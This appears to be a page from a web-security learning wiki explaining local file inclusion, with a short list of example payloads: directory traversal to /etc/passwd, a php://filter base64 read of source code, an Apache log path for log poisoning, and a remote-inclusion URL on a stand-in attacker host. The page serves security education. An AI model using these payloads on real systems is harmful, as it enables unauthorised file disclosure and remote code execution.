AppSecExplained
  • Index < START HERE
    • My courses
    • How to get started from zero
  • 📽️Live Stream Content
    • Resource of the week
  • Discovery / Recon
    • Methodology
    • Content discovery / recon
      • Subdomains
      • Endpoints
      • Parameters
      • Spidering
  • Common vulns
    • SQL injection overview
      • Detection
      • Blind SQLi
      • Second-order SQLi
      • SQLi lab setup & writeups
    • NoSQL injection
    • JavaScript injection (XSS)
      • XSS Methodology
    • File Inclusion
      • Local file inclusion
        • Directory traversal
    • Command injection
    • XXE (XML external entity) injection
      • Blind XXE
    • Template injection
      • Server-side template injection
      • Client-side template injection
    • Authentication
      • Attacking password-based authentication
      • Attacking MFA
      • Authentication lab setup & writeups
    • Cross-Site Request Forgery (CSRF)
    • Insecure deserialization
      • PHP
      • Java
      • Python
      • .NET
    • Server-side request forgery (SSRF)
    • Insecure file upload
    • Clickjacking
    • Open redirect
    • Vulnerable components
    • Race conditions
      • Limit overrun
    • Prototype pollution
      • Client-side prototype pollution
    • APIs
      • API: BOLA
      • API: Broken authentication
      • BOPLA
      • API: BFLA
  • Bypassing controls
    • Rate limiting
    • WAF Bypasses
  • Scripts
    • Docker-compose.yml files
      • Wordpress
      • SQLi testing labs
    • PHP scripts
      • RCE Function Check
    • Wordlists
      • Single characters
      • SQLi
  • Code review
    • Getting started
    • Sinks
  • Links worth your time
    • Practical API Hacking
    • Rana Khalil's Web Security Academy Course
    • Portswigger's Web Security Academy
    • TCM Security Discord
    • PentesterLand Writeups
Powered by GitBook
On this page
  • What is it?
  • Checklist
  • Exploitation

Was this helpful?

  1. Common vulns
  2. File Inclusion

Local file inclusion

What is it?

Local File Inclusion (LFI) is a vulnerability that allows an attacker to read and sometimes execute files on the victim’s system. This could lead to revealing sensitive information or even remote code execution if handled poorly by the application.

A simple example:

  • A vulnerable web application may have the endpoint /page?file={filename}

  • When a request is made, the application includes the specified file into the current script.

  • If an attacker inserts a path into {filename} such as ../../../etc/passwd, they might get access to the system files.

  • The application then includes this file, and if the file contents are outputted to the response, the attacker can view sensitive system information.

It's important to note that a payload or attack may change depending on the application and the server's file system. LFI can often lead to:

  • Sensitive data exposure

  • Remote code execution

  • Server information disclosure

Other learning resources:

  • PortSwigger: https://portswigger.net/web-security/file-path-traversal

  • PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

Checklist

Exploitation

Basic file inclusion

../../../etc/passwd

Using PHP filter for base64 encoding of the file

php://filter/read=convert.base64-encode/resource=index.php

Log poisoning

../../../var/log/apache2/access.log

RFI (if allow_url_include is on)

http://attacker.com/malicious.txt
PreviousFile InclusionNextDirectory traversal

Last updated 1 year ago

Was this helpful?